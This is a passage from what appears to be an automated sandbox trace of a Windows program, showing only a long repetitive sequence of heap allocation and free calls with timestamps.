hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.837] GetProcessHeap () returned 0x280000 [0059.837] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.837] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.838] GetProcessHeap () returned 0x280000 [0059.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.838] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.839] GetProcessHeap () returned 0x280000 [0059.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.840] GetProcessHeap () returned 0x280000 [0059.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.840] GetProcessHeap () returned 0x280000 [0059.841] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.841] GetProcessHeap () returned 0x280000 [0059.841] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.841] GetProcessHeap () returned 0x280000 [0059.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.852] GetProcessHeap () returned 0x280000 [0059.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.852] GetProcessHeap () returned 0x280000 [0059.855] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.857] GetProcessHeap () returned 0x280000 [0059.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.858] GetProcessHeap () returned 0x280000 [0059.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.859] GetProcessHeap () returned 0x280000 [0059.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.859] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.860] GetProcessHeap () returned 0x280000 [0059.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.860] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap 